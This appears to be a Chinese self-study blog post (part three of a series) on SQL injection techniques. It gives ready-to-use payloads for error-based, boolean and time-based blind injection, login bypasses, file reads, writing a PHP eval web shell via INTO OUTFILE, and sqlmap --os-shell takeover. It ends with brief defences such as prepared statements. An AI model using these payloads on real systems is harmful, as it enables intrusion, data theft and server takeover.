自学sql注入（三）

川长思鸟来 2023-02-25 10:29 17阅读 0赞

这是笔者自行整理出来的有关sql注入的一些知识点，自己还有些迷迷糊糊，可能有些不对的地方。等学完之后，再来详写一系列的关于sql注入的文章

[自学sql注入（一）][sql]  
[自学sql注入（二）][sql 1]

### 基于floor的报错注入： ###

1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

### 基于boolean的盲注 ###

Boolean是基于真假的判断（true or false）;  
不管输入什么，结果都只返回真或假两种情况；  
Boolean型盲注的关键在于通过表达式结果与已知值进行比对，根据比对结果判断正确与否

Boolean型盲注的判断方式有  
通过长度判断length():

select length(database())>=x

通过字符判断substr():

select substr(database(),1,1) =‘s’

通过ascII码判断:ascii():

select ascii(substr(database(),1,1)) =x

### 基于时间的盲注： ###

页面不返回任何信息  
通过时间回显的延迟作为判断。  
利用sleep()或benchmark()函数延长mysql的执行时间；  
与if()搭配使用

时间型盲注

payload:if(expr1,expr2,expr3)

语义解析：  
**对expr1进行布尔判断，如果为真，则执行expr2,如果为假，则执行expr3**  
常用payload：  
**if(length(database())>1,sleep(5),1)**  
如果数据库名字符长度大于1为真，则mysql休眠5秒，否则查询1

盲注常用函数  
left(m,n) --从左向右截取字符串m返回其前n位  
substr(m,1,1) --取字符串m的左边第一位起，1字长的字符串  
ascii(m) --返回字符m的ASCII码  
if(str1,str2,str3)–如果str1正确就执行str2，否则执行str3  
sleep(m)–使程序暂停m秒  
length(m) --返回字符串m的长度  
count(column\_name) --返回指定列的值的数目

### sql注入文件读写 ###

利用sql进行读写需要一个非常重要的前置条件：secure\_file\_priv  
在数据库中输入show global variables like ‘%secure%’命令查看secure\_file\_priv的值。  
secure\_file\_priv=null，不能进行写入导出；  
secure\_file\_priv=空（什么都没有），可以进行写入导出；  
secure\_file\_priv=/tmp/，写入导出只能在/tmp/进行。  
该配置可以在my.cnf中进行修改。

读取：Select load\_file(‘c:/wamp/www/flag.txt’);读取文件，必须知道绝对路径  
写入：1’ union select 1,2,“<?php@eval($\_GET\[‘test’\]);?>” into outfile‘c:/wamp/www/test1.php’ %23

### 使用sqlmap控制服务器的方法： ###

1、正常找到注入点；  
2、输入–current-user，获得当前用户信息；  
3、输入–is-dba，查看是否为数据库管理员，返回TRUE时代表是管理员  
4、输入–os-shell，尝试获得系统权限，选择正确的服务器语言以及上传路径

### 万能密码 ###

本质上是基于sql注入的永真条件来实现万能密码登录  
1 or 1=1  
1’ or 1=1\#

### post的注入 ###

常见于登录面板  
使用burpsuite抓包到repeater进行手工注入  
将注入请求的数据包保存到一个txt文档例如sql.txt，然后在sqlmap中使用sqlmap.py -r "sql.txt"来进行注入

### sql注入的防护 ###

1、对输入严格过滤和转义  
使用addslashes，mysqli\_real\_escape\_string对字符进行过滤或转义，本质基于黑名单，存在绕过可能性；  
2、预编译和参数化（推荐）  
使用pdo的prepare对输入进行预处理；  
3、部署waf（硬件waf，安全狗）  
存在绕过可能性  
4、云端防护（360网站卫士，阿里云盾）  
通过dns将用户输入先解析到云防护上，确认安全再请求目标服务器

[sql]: https://blog.csdn.net/weixin_45663905/article/details/107303451
[sql 1]: https://blog.csdn.net/weixin_45663905/article/details/107303655